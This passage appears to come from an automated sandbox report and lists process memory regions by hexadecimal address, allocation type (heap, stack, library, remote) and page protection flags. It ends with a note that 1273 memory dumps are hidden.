page read and write
7FFC013B0000
trusted library allocation
page read and write
19036003000
heap
page read and write
20DC2940000
trusted library allocation
page read and write
20DAB886000
trusted library allocation
page read and write
19035B9A000
heap
page read and write
24279BBA000
heap
page read and write
7FFC012F0000
trusted library allocation
page read and write
1DD5A6F0000
heap
page read and write
20DC2A98000
heap
page read and write
24906000000
heap
page read and write
1DD5A590000
trusted library allocation
page read and write
7FFC013A0000
trusted library allocation
page read and write
203896A0000
heap
page readonly
2E93F9E0000
heap
page read and write
1B56A481000
heap
page read and write
2E9419D6000
heap
page read and write
7FFC013E0000
trusted library allocation
page read and write
20DC2A90000
heap
page read and write
1070779000
stack
page read and write
28560C29000
heap
page read and write
1DD5A6FB000
heap
page read and write
7FFC01315000
trusted library allocation
page read and write
24200001000
trusted library allocation
page read and write
2427BCE0000
trusted library allocation
page read and write
20DC3230000
trusted library allocation
page read and write
7FFC013A0000
trusted library allocation
page read and write
211D886D000
heap
page read and write
15ED9F49000
heap
page read and write
19035B99000
heap
page read and write
19035B71000
heap
page read and write
20DC30B0000
trusted library allocation
page read and write
1DD54E29000
heap
page read and write
1B56A513000
heap
page read and write
15EDA130000
heap
page read and write
15EC214D000
trusted library allocation
page read and write
2427BBD8000
heap
page read and write
113292C3000
heap
page read and write
1DD5A190000
trusted library allocation
page read and write
20DA89A8000
heap
page read and write
20DBA9A4000
trusted library allocation
page read and write
20DC3310000
trusted library allocation
page read and write
20DAB854000
trusted library allocation
page read and write
20DC2991000
trusted library allocation
page read and write
15EC1C6B000
trusted library allocation
page read and write
19035BD3000
heap
page read and write
21780852000
heap
page read and write
24906071000
heap
page read and write
28560C02000
heap
page read and write
2D584C40000
heap
page read and write
2E9418D6000
heap
page read and write
10CB5FE000
stack
page read and write
7FFC01330000
trusted library allocation
page read and write
3BA97FD000
stack
page read and write
1B56A390000
heap
page read and write
1569C830000
heap
page read and write
113292BA000
heap
page read and write
2D584C75000
heap
page read and write
19035B96000
heap
page read and write
EE67FFF000
stack
page read and write
21780880000
heap
page read and write
7FFC01320000
trusted library allocation
page read and write
20DAB402000
trusted library allocation
page read and write
211D8800000
heap
page read and write
2E941DD0000
heap
page read and write
7FFC01390000
trusted library allocation
page read and write
7FFC01220000
trusted library allocation
page execute and read and write
15ED9DF0000
trusted library allocation
page read and write
1903544A000
heap
page read and write
43E6B6B000
stack
page read and write
11329287000
heap
page read and write
2489A802000
trusted library allocation
page read and write
24906055000
heap
page read and write
19035B6A000
heap
page read and write
15EBFE05000
heap
page read and write
C1387A000
stack
page read and write
2E941CB6000
heap
page read and write
20DA8A24000
heap
page read and write
1569C896000
heap
page read and write
2427BD10000
trusted library allocation
page read and write
19035B61000
heap
page read and write
20DC31D0000
trusted library allocation
page read and write
2427B540000
trusted library allocation
page read and write
2427BC96000
heap
page read and write
4A4E4FE000
stack
page read and write
20DC32E0000
trusted library allocation
page read and write
190354C1000
heap
page read and write
15EBFE48000
heap
page read and write
20DC29D0000
trusted library allocation
page read and write
2E941EB8000
heap
page read and write
28560BE0000
remote allocation
page read and write
113292C9000
heap
page read and write
2E941C6E000
heap
page read and write
1569C880000
heap
page read and write
211D8813000
heap
page read and write
19035452000
heap
page read and write
63E55DD000
stack
page read and write
15EBFEBC000
heap
page read and write
20DC3360000
trusted library allocation
page read and write
15ED9F49000
heap
page read and write
20DC33E0000
trusted library allocation
page read and write
20DA8B40000
heap
page execute and read and write
21780908000
heap
page read and write
1DD54EFA000
heap
page read and write
20DC2F30000
heap
page read and write
2489A002000
heap
page read and write
1569C885000
heap
page read and write
19035B91000
heap
page read and write
1DD55759000
heap
page read and write
211D8866000
heap
page read and write
2427BD10000
trusted library allocation
page read and write
20DC2990000
trusted library allocation
page read and write
190351A0000
heap
page read and write
15EC1730000
heap
page read and write
20DC2AF5000
heap
page read and write
7FFC01440000
trusted library allocation
page read and write
15EC2010000
trusted library allocation
page read and write
19035A02000
heap
page read and write
10CB17E000
stack
page read and write
24906802000
trusted library allocation
page read and write
19035B50000
heap
page read and write
F77DCFD000
stack
page read and write
1DD54EA6000
heap
page read and write
19035B7E000
heap
page read and write
20DC3440000
trusted library allocation
page read and write
20DC2A3C000
heap
page read and write
19035BDC000
heap
page read and write
7FFC01330000
trusted library allocation
page read and write
2D584D00000
heap
page read and write
20DC3210000
trusted library allocation
page read and write
28560C00000
heap
page read and write
28611FE000
stack
page read and write
2E93F9F2000
heap
page read and write
7FFC01400000
trusted library allocation
page read and write
20DC29A0000
trusted library allocation
page read and write
7FFC01440000
trusted library allocation
page read and write
28613BD000
stack
page read and write
10701FC000
stack
page read and write
20DC3280000
trusted library allocation
page read and write
20DC3460000
trusted library allocation
page read and write
20DC30D0000
trusted library allocation
page read and write
20DC29D0000
trusted library allocation
page read and write
4A4E77E000
stack
page read and write
20DC30D7000
trusted library allocation
page read and write
1B56A500000
heap
page read and write
20DC3410000
trusted library allocation
page read and write
20DC3120000
trusted library allocation
page read and write
211D887B000
heap
page read and write
7FFC011C0000
trusted library allocation
page execute and read and write
7FFC011B0000
trusted library allocation
page read and write
2489A053000
heap
page read and write
15EC215F000
trusted library allocation
page read and write
21780861000
heap
page read and write
20DC31A0000
trusted library allocation
page read and write
20388920000
trusted library allocation
page read and write
2427BCD0000
trusted library allocation
page read and write
2860FFE000
stack
page read and write
2427B580000
trusted library allocation
page read and write
2E9419FC000
heap
page read and write
190359E0000
remote allocation
page read and write
19035B7D000
heap
page read and write
15ED9E50000
heap
page execute and read and write
C13778000
stack
page read and write
24200068000
trusted library allocation
page read and write
211D886B000
heap
page read and write
20DC29A0000
trusted library allocation
page read and write
21780802000
heap
page read and write
AED54FE000
stack
page read and write
7FFC01350000
trusted library allocation
page read and write
15ED9F2F000
heap
page read and write
7FFC01104000
trusted library allocation
page read and write
7FFC011B6000
trusted library allocation
page read and write
20DBA9C4000
trusted library allocation
page read and write
3BA9C7E000
stack
page read and write
20DC3140000
trusted library allocation
page read and write
211D883E000
heap
page read and write
15ED9F4F000
heap
page read and write
20DC29A0000
trusted library allocation
page read and write
7FFC012F0000
trusted library allocation
page execute and read and write
1B56AC02000
trusted library allocation
page read and write
7FFC012D0000
trusted library allocation
page execute and read and write
20DAB8AE000
trusted library allocation
page read and write
20DC2A90000
heap
page read and write
19035B7B000
heap
page read and write
2178086F000
heap
page read and write
20DC29A0000
trusted library allocation
page read and write
20DA8890000
remote allocation
page read and write
F77D9FC000
stack
page read and write
2489A013000
heap
page read and write
2427BBF7000
heap
page read and write
19035B9B000
heap
page read and write
20DABEC2000
trusted library allocation
page read and write
15EC1790000
heap
page readonly
20DC2991000
trusted library allocation
page read and write
CD9337F000
stack
page read and write
20DC30F0000
trusted library allocation
page read and write
28560B80000
heap
page read and write
20DC2990000
trusted library allocation
page read and write
19036002000
heap
page read and write
24279F25000
heap
page read and write
7FFC01370000
trusted library allocation
page read and write
20DC33F0000
trusted library allocation
page read and write
3BA9305000
stack
page read and write
15ED9E56000
heap
page execute and read and write
2861438000
stack
page read and write
2D584C28000
heap
page read and write
7FFC01294000
trusted library allocation
page read and write
2CA447F000
stack
page read and write
20DC29F0000
heap
page execute and read and write
1903543C000
heap
page read and write
7FFC01110000
trusted library allocation
page read and write
1DD55600000
heap
page read and write
15EC20E4000
trusted library allocation
page read and write
24200B96000
trusted library allocation
page read and write
1DD54F26000
heap
page read and write
15EC22C0000
trusted library allocation
page read and write
1DD5A62C000
heap
page read and write
24279AE0000
heap
page read and write
19035B8C000
heap
page read and write
7FFC01200000
trusted library allocation
page execute and read and write
19035BB4000
heap
page read and write
211D884B000
heap
page read and write
19035508000
heap
page read and write
20DA8830000
heap
page read and write
19035B8C000
heap
page read and write
7FFC010E3000
trusted library allocation
page execute and read and write
1DD55718000
heap
page read and write
1569C898000
heap
page read and write
1DD5A6AA000
heap
page read and write
20DAA4A0000
heap
page read and write
19035B71000
heap
page read and write
1569C861000
heap
page read and write
1DD54E00000
heap
page read and write
20DC3260000
trusted library allocation
page read and write
2CA4379000
stack
page read and write
20DC3340000
trusted library allocation
page read and write
24279AD0000
unkown
page read and write
1DD55718000
heap
page read and write
211D86A0000
heap
page read and write
20DC2970000
trusted library allocation
page read and write
7FFC012A2000
trusted library allocation
page read and write
10CAD7B000
stack
page read and write
1DD5A660000
heap
page read and write
20389450000
trusted library allocation
page read and write
2E93FA59000
heap
page read and write
15ED9F32000
heap
page read and write
211D8863000
heap
page read and write
24906002000
heap
page read and write
19035B7D000
heap
page read and write
1B56A320000
heap
page read and write
15ED9E76000
heap
page read and write
20DC2B3B000
heap
page read and write
4A4E47E000
stack
page read and write
1DD54E73000
heap
page read and write
1DD54E54000
heap
page read and write
19035BAF000
heap
page read and write
20DC3370000
trusted library allocation
page read and write
7FFC011C6000
trusted library allocation
page execute and read and write
1AD27E000
stack
page read and write
1AD6FE000
unkown
page read and write
1B56A449000
heap
page read and write
19035B72000
heap
page read and write
1DD54E3F000
heap
page read and write
24905E50000
heap
page read and write
190354EA000
heap
page read and write
20DC3090000
trusted library allocation
page read and write
20DA89B2000
heap
page read and write
2489A029000
heap
page read and write
24279AD0000
unkown
page read and write
19035B8C000
heap
page read and write
1DD5A700000
heap
page read and write
20DC33B0000
trusted library allocation
page read and write
10CAEFF000
stack
page read and write
19035210000
heap
page read and write
211D884E000
heap
page read and write
20DC3330000
trusted library allocation
page read and write
20DAA340000
trusted library allocation
page read and write
10705F9000
stack
page read and write
20DC29D0000
trusted library allocation
page read and write
24279BA0000
heap
page read and write
15ED9F23000
heap
page read and write
7FFC0110D000
trusted library allocation
page execute and read and write
1DD5A180000
trusted library allocation
page read and write
1903542C000
heap
page read and write
28560BE0000
remote allocation
page read and write
20DC2981000
trusted library allocation
page read and write
1569C897000
heap
page read and write
1B56A502000
heap
page read and write
20DABD40000
trusted library allocation
page read and write
20DC3250000
trusted library allocation
page read and write
20DC2991000
trusted library allocation
page read and write
7FFC011BC000
trusted library allocation
page execute and read and write
211D8851000
heap
page read and write
2489A070000
heap
page read and write
2427B5D0000
heap
page read and write
19035B96000
heap
page read and write
24279B30000
heap
page read and write
7FFC01360000
trusted library allocation
page read and write
19035B76000
heap
page read and write
19035B96000
heap
page read and write
2CA43FF000
stack
page read and write
15ED9E10000
trusted library allocation
page read and write
2D584AC0000
heap
page read and write
1AD377000
stack
page read and write
7FFC01400000
trusted library allocation
page read and write
FD711FF000
stack
page read and write
19035B99000
heap
page read and write
19035B6F000
heap
page read and write
19035B75000
heap
page read and write
2427BD10000
trusted library allocation
page read and write
7FFC012D0000
trusted library allocation
page execute and read and write
15ED9E81000
heap
page read and write
1DD5A480000
remote allocation
page read and write
1DD5A480000
trusted library allocation
page read and write
7FFC01430000
trusted library allocation
page read and write
15EBFDD3000
heap
page read and write
20DC3180000
trusted library allocation
page read and write
19035BAA000
heap
page read and write
7FFC0129C000
trusted library allocation
page read and write
24279C1E000
heap
page read and write
19036002000
heap
page read and write
20DAA3C0000
heap
page read and write
28560B10000
heap
page read and write
7FFC01360000
trusted library allocation
page read and write
1DD54DC0000
trusted library allocation
page read and write
19035B75000
heap
page read and write
2178086F000
heap
page read and write
7FFC01400000
trusted library allocation
page read and write
1AD0FE000
stack
page read and write
20DABEB1000
trusted library allocation
page read and write
2427BC3E000
heap
page read and write
24279C1C000
heap
page read and write
1DD5A210000
trusted library allocation
page read and write
19035B75000
heap
page read and write
1AD67E000
stack
page read and write
24279AC0000
unkown
page readonly
20DC2A22000
heap
page read and write
10CB2FC000
stack
page read and write
2E941BD0000
heap
page read and write
1DD5A200000
trusted library allocation
page read and write
1DD54EA1000
heap
page read and write
7FFC01113000
trusted library allocation
page read and write
7FFC012E2000
trusted library allocation
page read and write
FD713FE000
stack
page read and write
1569C885000
heap
page read and write
20DC29C0000
trusted library allocation
page read and write
15ED9DF0000
trusted library allocation
page read and write
19035BA7000
heap
page read and write
CD938FE000
stack
page read and write
19035BC0000
heap
page read and write
CD937F8000
stack
page read and write
24279F20000
heap
page read and write
43E6E7D000
stack
page read and write
20DC31E0000
trusted library allocation
page read and write
15ED9E00000
trusted library allocation
page read and write
15ED1C51000
trusted library allocation
page read and write
CD932FE000
stack
page read and write
2427BD10000
trusted library allocation
page read and write
211D8842000
heap
page read and write
19035B73000
heap
page read and write
3BA9AFE000
stack
page read and write
20DC29F7000
heap
page execute and read and write
20DC2990000
trusted library allocation
page read and write
21780780000
heap
page read and write
2489A03C000
heap
page read and write
20DC29B0000
trusted library allocation
page read and write
7FFC01410000
trusted library allocation
page read and write
CD92FCE000
stack
page read and write
1903546D000
heap
page read and write
EE67CFF000
stack
page read and write
20DA8A9A000
heap
page read and write
2E93FA25000
heap
page read and write
211D882C000
heap
page read and write
20389690000
trusted library allocation
page read and write
190354E7000
heap
page read and write
15EC1BA0000
heap
page execute and read and write
2420148C000
trusted library allocation
page read and write
20DC3430000
trusted library allocation
page read and write
7FFC0119C000
trusted library allocation
page execute and read and write
15ED9EEB000
heap
page read and write
20DC2970000
trusted library allocation
page read and write
20DA89A0000
heap
page read and write
15EBFCE0000
heap
page read and write
10CB07B000
stack
page read and write
2E93FA18000
heap
page read and write
1132926F000
heap
page read and write
15ED9DF0000
trusted library allocation
page read and write
24906068000
heap
page read and write
2D584C79000
heap
page read and write
2E9418E5000
heap
page read and write
1DD54EAA000
heap
page read and write
190359E0000
remote allocation
page read and write
1DD55702000
heap
page read and write
EB33CFE000
stack
page read and write
20DC2950000
trusted library allocation
page read and write
7FFC010F3000
trusted library allocation
page read and write
7FFC010E4000
trusted library allocation
page read and write
19035B7F000
heap
page read and write
20DC2971000
trusted library allocation
page read and write
3BA9D7B000
stack
page read and write
15ED9DF1000
trusted library allocation
page read and write
7FFC01103000
trusted library allocation
page execute and read and write
1DD55713000
heap
page read and write
EE680FF000
stack
page read and write
11329213000
heap
page read and write
7FFC01480000
trusted library allocation
page read and write
2E93FA19000
heap
page read and write
20DC29A0000
trusted library allocation
page read and write
20DC32C0000
trusted library allocation
page read and write
1AD477000
stack
page read and write
24279C72000
heap
page read and write
211D9002000
trusted library allocation
page read and write
19035455000
heap
page read and write
7FFC01397000
trusted library allocation
page read and write
7FFC01460000
trusted library allocation
page read and write
AED567F000
stack
page read and write
15ED9F49000
heap
page read and write
15EC22BC000
trusted library allocation
page read and write
2E941900000
heap
page read and write
20DC3450000
trusted library allocation
page read and write
1569C896000
heap
page read and write
1DD54EFA000
heap
page read and write
CD9357D000
stack
page read and write
20DC29E0000
trusted library allocation
page read and write
1DD5A440000
trusted library allocation
page read and write
15ED9E00000
trusted library allocation
page read and write
7FFC01377000
trusted library allocation
page read and write
20388BD5000
heap
page read and write
28614BF000
stack
page read and write
2427B6D0000
heap
page read and write
24200B99000
trusted library allocation
page read and write
15EC2156000
trusted library allocation
page read and write
24200BCB000
trusted library allocation
page read and write
19035BAE000
heap
page read and write
24906067000
heap
page read and write
15ED9F2F000
heap
page read and write
1AD7F8000
stack
page read and write
2E9418F7000
heap
page read and write
19035513000
heap
page read and write
7DF4B34C0000
trusted library allocation
page execute and read and write
CD943CE000
stack
page read and write
19035B9B000
heap
page read and write
19035B80000
heap
page read and write
2D584C00000
heap
page read and write
20DA8B60000
heap
page read and write
24906029000
heap
page read and write
20DC2F00000
trusted library allocation
page read and write
11329060000
heap
page read and write
20DC31B0000
trusted library allocation
page read and write
20DA8A00000
heap
page read and write
20DC29C0000
trusted library allocation
page read and write
EE684FE000
stack
page read and write
CD933FE000
stack
page read and write
1DD54E58000
heap
page read and write
20DC3110000
trusted library allocation
page read and write
1DD5A69C000
heap
page read and write
15ED9E10000
trusted library allocation
page read and write
1AD579000
stack
page read and write
15ED9DF1000
trusted library allocation
page read and write
15ED9F19000
heap
page read and write
2D584AD0000
heap
page read and write
2E9418E7000
heap
page read and write
15EC1760000
trusted library allocation
page read and write
20DC3420000
trusted library allocation
page read and write
28560C13000
heap
page read and write
20DABC95000
trusted library allocation
page read and write
2489A100000
heap
page read and write
15EC1EFE000
trusted library allocation
page read and write
1569C866000
heap
page read and write
7FFC013B0000
trusted library allocation
page read and write
43E707B000
stack
page read and write
20DC2B4F000
heap
page read and write
15EC1D5D000
trusted library allocation
page read and write
107057D000
stack
page read and write
1DD5A702000
heap
page read and write
190354B1000
heap
page read and write
20388BC0000
trusted library allocation
page read and write
10CB1FB000
stack
page read and write
C1332B000
stack
page read and write
20DA8970000
heap
page read and write
2420149D000
trusted library allocation
page read and write
190353E0000
trusted library allocation
page read and write
7FFC012B1000
trusted library allocation
page read and write
CD93678000
stack
page read and write
15ED9DF0000
trusted library allocation
page read and write
7FFC0110D000
trusted library allocation
page execute and read and write
24279C7F000
heap
page read and write
19035B9C000
heap
page read and write
2E9418E4000
heap
page read and write
20DC3200000
trusted library allocation
page read and write
19035B6C000
heap
page read and write
20DC2A31000
heap
page read and write
1903544B000
heap
page read and write
15EDA140000
heap
page read and write
28560BE0000
remote allocation
page read and write
19035B9B000
heap
page read and write
19036000000
heap
page read and write
15EC1C51000
trusted library allocation
page read and write
28561402000
trusted library allocation
page read and write
20DC3150000
trusted library allocation
page read and write
20DC2F10000
trusted library allocation
page read and write
7FFC013D0000
trusted library allocation
page read and write
20DC2900000
heap
page execute and read and write
19035B96000
heap
page read and write
7FFC012BD000
trusted library allocation
page read and write
2489A04E000
heap
page read and write
1B56A429000
heap
page read and write
24905EC0000
heap
page read and write
2E93FA36000
heap
page read and write
15EC228C000
trusted library allocation
page read and write
211D8830000
heap
page read and write
20DA8B50000
trusted library allocation
page read and write
1B56A413000
heap
page read and write
CD936F7000
stack
page read and write
211D8690000
heap
page read and write
20DC2990000
trusted library allocation
page read and write
EB338FC000
stack
page read and write
19035B8F000
heap
page read and write
15EBFE71000
heap
page read and write
19035B7B000
heap
page read and write
15ED9F2F000
heap
page read and write
211D8877000
heap
page read and write
190354E3000
heap
page read and write
19035B79000
heap
page read and write
19035B9E000
heap
page read and write
19035B76000
heap
page read and write
15ED9DF0000
trusted library allocation
page read and write
1AD1FC000
stack
page read and write
19035B0B000
heap
page read and write
1DD5A63C000
heap
page read and write
21780902000
heap
page read and write
C13DFA000
stack
page read and write
20DC33A0000
trusted library allocation
page read and write
24905FC0000
trusted library allocation
page read and write
1B56A44E000
heap
page read and write
19035B9A000
heap
page read and write
15ED9F23000
heap
page read and write
20DBA800000
trusted library allocation
page read and write
15ED9F21000
heap
page read and write
15ED9F4F000
heap
page read and write
2427BD20000
trusted library allocation
page read and write
2427BD10000
trusted library allocation
page read and write
20DC2AF8000
heap
page read and write
15EBFE7F000
heap
page read and write
15ED9E10000
trusted library allocation
page read and write
20DC3380000
trusted library allocation
page read and write
211D887E000
heap
page read and write
1B56A476000
heap
page read and write
19035B7D000
heap
page read and write
1B56A330000
heap
page read and write
15ED9DF0000
trusted library allocation
page read and write
43E6BEE000
stack
page read and write
2E93F8F0000
heap
page read and write
CD9387F000
stack
page read and write
15ED9EC5000
heap
page read and write
15ED9DD0000
trusted library allocation
page read and write
1DD5A340000
trusted library allocation
page read and write
1569C880000
heap
page read and write
20DA89FA000
heap
page read and write
15EC17E0000
heap
page read and write
211D8844000
heap
page read and write
15EC2282000
trusted library allocation
page read and write
20DC2B33000
heap
page read and write
19035B71000
heap
page read and write
20DABC8C000
trusted library allocation
page read and write
43E73FE000
stack
page read and write
2E9418EA000
heap
page read and write
11329B00000
heap
page read and write
20DC3270000
trusted library allocation
page read and write
7FFC01282000
trusted library allocation
page read and write
20DC2990000
trusted library allocation
page read and write
19035B00000
heap
page read and write
20388BE0000
trusted library allocation
page read and write
2427BD66000
heap
page read and write
19035B9B000
heap
page read and write
19035BB9000
heap
page read and write
1DD54EA4000
heap
page read and write
211D8846000
heap
page read and write
15ED9E60000
heap
page read and write
EB339FE000
stack
page read and write
20DC2940000
trusted library allocation
page read and write
7FFC01350000
trusted library allocation
page read and write
2427BDA5000
heap
page read and write
15EC1CB0000
trusted library allocation
page read and write
15EC20C6000
trusted library allocation
page read and write
7FFC01310000
trusted library allocation
page read and write
15ED9E20000
trusted library allocation
page read and write
CD92F85000
stack
page read and write
1DD5A350000
trusted library allocation
page read and write
7FFC01380000
trusted library allocation
page read and write
19035B9C000
heap
page read and write
2E941A9B000
heap
page read and write
43E71F7000
stack
page read and write
20DC29B0000
trusted library allocation
page read and write
EB33DFD000
stack
page read and write
7FFC011B0000
trusted library allocation
page read and write
211D882D000
heap
page read and write
1DD54F02000
heap
page read and write
28610FE000
stack
page read and write
1569C86F000
heap
page read and write
211D8852000
heap
page read and write
21780829000
heap
page read and write
7FFC013A0000
trusted library allocation
page read and write
2427BCC0000
trusted library allocation
page read and write
FD712FB000
stack
page read and write
19035B9D000
heap
page read and write
20DABD48000
trusted library allocation
page read and write
24906113000
heap
page read and write
1DD5A6F8000
heap
page read and write
15EBFEAF000
heap
page read and write
2E93F7B0000
heap
page read and write
24201484000
trusted library allocation
page read and write
2D585402000
trusted library allocation
page read and write
1B56A400000
heap
page read and write
15ED9DD4000
trusted library allocation
page read and write
20DAB591000
trusted library allocation
page read and write
15ED9E00000
trusted library allocation
page read and write
2E941DD2000
heap
page read and write
10CA90C000
stack
page read and write
1132923E000
heap
page read and write
7FFC01370000
trusted library allocation
page read and write
24279AB0000
unkown
page readonly
19035502000
heap
page read and write
20DC335D000
trusted library allocation
page read and write
7FFC011BC000
trusted library allocation
page execute and read and write
1569C876000
heap
page read and write
7FFC01320000
trusted library allocation
page read and write
1DD5A364000
trusted library allocation
page read and write
20388938000
heap
page read and write
20DC2970000
trusted library allocation
page read and write
63E587E000
stack
page read and write
C13979000
stack
page read and write
2427BDB0000
heap
page read and write
There are 1273 hidden memdumps, click here to show them.